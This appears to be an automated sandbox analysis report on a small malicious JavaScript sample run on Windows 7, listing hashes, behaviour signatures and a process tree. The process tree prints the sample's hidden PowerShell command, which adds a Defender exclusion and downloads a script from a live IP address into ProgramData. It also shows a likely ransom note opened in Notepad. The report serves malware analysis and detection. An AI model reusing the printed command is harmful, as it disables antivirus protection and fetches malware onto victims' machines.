Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
27/05/2023, 06:47
Static task
static1
Behavioral task
behavioral1
Sample
c80a26b806b3486c6157d8904c2e13e7.js
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
c80a26b806b3486c6157d8904c2e13e7.js
Resource
win10v2004-20230220-en
General
-
Target
c80a26b806b3486c6157d8904c2e13e7.js
-
Size
1KB
-
MD5
c80a26b806b3486c6157d8904c2e13e7
-
SHA1
54d8be3eb5bdd4a788dcef3265cab6c314be1ccc
-
SHA256
64339638d9234ab1efe25fe180b3097a6614687c8f83b1cc0c5a1dde570aaf81
-
SHA512
4b7c084016a3fb20ae5b95c51c0459c327b163f0d7d942d931182009cd4bde50f24a867d7e60b62a6801189bcb4bba425b474e85b009ccb27e88bc3af6f59200
Malware Config
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1592 1968 cmd.exe 30 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 676 1968 cmd.exe 30 -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 828 wscript.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 788 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 892 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 892 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 1592 wrote to memory of 1812 1592 cmd.exe 35 PID 1592 wrote to memory of 1812 1592 cmd.exe 35 PID 1592 wrote to memory of 1812 1592 cmd.exe 35 PID 1812 wrote to memory of 892 1812 cmd.exe 37 PID 1812 wrote to memory of 892 1812 cmd.exe 37 PID 1812 wrote to memory of 892 1812 cmd.exe 37 PID 676 wrote to memory of 788 676 cmd.exe 38 PID 676 wrote to memory of 788 676 cmd.exe 38 PID 676 wrote to memory of 788 676 cmd.exe 38
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c80a26b806b3486c6157d8904c2e13e7.js1⤵
- Blocklisted process makes network request
PID:828
-
C:\Windows\system32\cmd.execmd /c start /MIN C:\ProgramData\BLD.bat1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\ProgramData\BLD.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -WindowStyle hidden "Add-MpPreference -ExclusionExtension "Start-Sleep -Seconds 3;"Invoke-WebRequest 'http://188.227.59.169/zayavka/1.yay' -OutFile 'C:\ProgramData\archive.ps1'";3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
-
C:\Windows\system32\cmd.execmd /c start C:\ProgramData\zayavka2.txt1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:676 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\zayavka2.txt2⤵
- Opens file in notepad (likely ransom note)
PID:788
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
322B
MD5018d63793042f588a85968475d98decf
SHA12c4f9a0bd490c2b53976adf08805dcc92fac349a
SHA256afa8d3929a2809a91ffaa775fcc953b293e52b8accce3cd24c843cb0abbd13d0
SHA512ee91d2218f6ac4d763858c8be3cc7ee23660de14e8dd6aea2a4a40b45a5aa6c3337ac13a366db52aab796f04058e2ec92ec81dec6c3cb93d4c310f59a6f9f98a
-
Filesize
1KB
MD56cea5f86700d707b53b8f4a67d1ccf29
SHA137e53dd35cbf58bd9c3b7ba0bbd7be81fcb9fe54
SHA2566e9ba5a17bb1ee71c64337b4cd794336eaed26e79d5e2eba6c31018bc9103c70
SHA512d836c1624995dd93462fa462ec83c5c150189c0e7b2c0c9eeb923c7b7aec40aa91e27f10ac7b5a4dc8e78c2dc8df121c97022e9b8fbdaf0d5c93f59a0e535c29